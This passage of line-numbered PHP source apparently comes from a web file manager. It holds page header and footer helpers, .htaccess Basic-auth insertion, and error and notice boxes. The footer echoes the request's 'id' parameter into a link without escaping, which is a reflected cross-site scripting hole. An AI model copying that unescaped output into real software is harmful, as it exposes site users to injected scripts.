1365. function buildphrase ($repl, $str) {
1366.     if (!is_array($repl)) $repl = array($repl);
1367.     $newstr = ''; $prevz = ' ';
1368.     for ($i = 0; $i < strlen($str); $i++) {
1369.         $z = substr($str, $i, 1);
1370.         if (((int) $z) > 0 && ((int) $z) <= count($repl) && $prevz == ' ') $newstr .= $repl[((int) $z) - 1]; else $newstr .= $z;
1371.         $prevz = $z;
1372.     }
1373.     return $newstr;
1374. }
1375.  
1376. function html_header ($action) {
1377.     global $self;
1378.     global $error, $notice, $updatetreeview;
1379. ?>
1380. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
1381. <html>
1382. <head>
1383.     <title><?php echo("$self - $action"); ?></title>
1384.     <style type="text/css">
1385.     <!--
1386.         td { font-family: sans-serif; font-size: 10pt; }
1387.         a:link, a:visited, a:active { text-decoration: none; color: #000088; }
1388.         a:hover { text-decoration: underline; color: #000088; }
1389.         .perm { font-family: monospace; font-size: 10pt; }
1390.     -->
1391.     </style>
1392. <?php
1393.     if (isset($_REQUEST['edit']) && !isset($_POST['save']) && basename($edit = $_REQUEST['edit']) == '.htaccess') {
1394.         $file = dirname($edit) . '/.htpasswd';
1395. ?>
1396.     <script type="text/javascript" language="JavaScript">
1397.     <!--
1398.     function autheinf () {
1399.         document.f.content.value += "Authtype Basic\nAuthName \"Restricted Directory\"\n";
1400.         document.f.content.value += "AuthUserFile <?php echo(htmlentities($file)); ?>\n";
1401.         document.f.content.value += "Require valid-user";
1402.     }
1403.     //-->
1404.     </script>
1405. <?php
1406.     }
1407. ?>
1408. </head>
1409. <body bgcolor="#FFFFFF"<?php if ($updatetreeview && !empty($_SESSION['tree'])) echo(" onLoad=\"void(parent.treeview.location.replace('$self?frame=treeview&dir=" . urlencode($_SESSION['dir']) . '&' . SID . '&pmru=' . time() . '#' . urlencode($_SESSION['dir']) . "'))\""); ?>>
1410. <?php
1411.     if (!empty($error)) perror($error);
1412.     if (!empty($notice)) pnotice($notice);
1413.     return;
1414. }
1415.  
1416. function html_footer ($backbutton = TRUE) {
1417.     global $self, $words;
1418.     if ($backbutton) {
1419. ?>
1420.     <p>
1421.     <table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
1422.     <table border="0" cellspacing="1" cellpadding="4"><tr><td bgcolor="#EEEEEE">
1423.     <a href="<?php echo("$self?id=". $_REQUEST['id']); ?>"><?php echo($words['back']); ?></a>
1424.     </td></tr></table>
1425.     </td></tr></table>
1426.     </p>
1427. <?php
1428.     }
1429. ?>
1430. </body>
1431. </html>
1432. <?php
1433.     return;
1434. }
1435.  
1436. function perror ($str) {
1437. ?>
1438.     <p>
1439.     <table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
1440.     <table border="0" cellspacing="1" cellpadding="4"><tr><td bgcolor="#FFCCCC">
1441.     <?php echo("$str\n"); ?>
1442.     </td></tr></table>
1443.     </td></tr></table>
1444.     </p>
1445. <?php
1446.     return;
1447. }
1448.  
1449. function pnotice ($str) {
1450. ?>
1451.     <p>
1452.     <table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
1453.     <table border="0" cellspacing="1" cellpadding="4"><tr><td bgcolor="#CCFFCC">
1454.     <?php echo("$str\n"); ?>
1455.     </td></tr></table>
1456.     </td></tr></table>
1457.     </p>
1458. <?php
1459.     return;
1460. }
1461.  
1462. ?>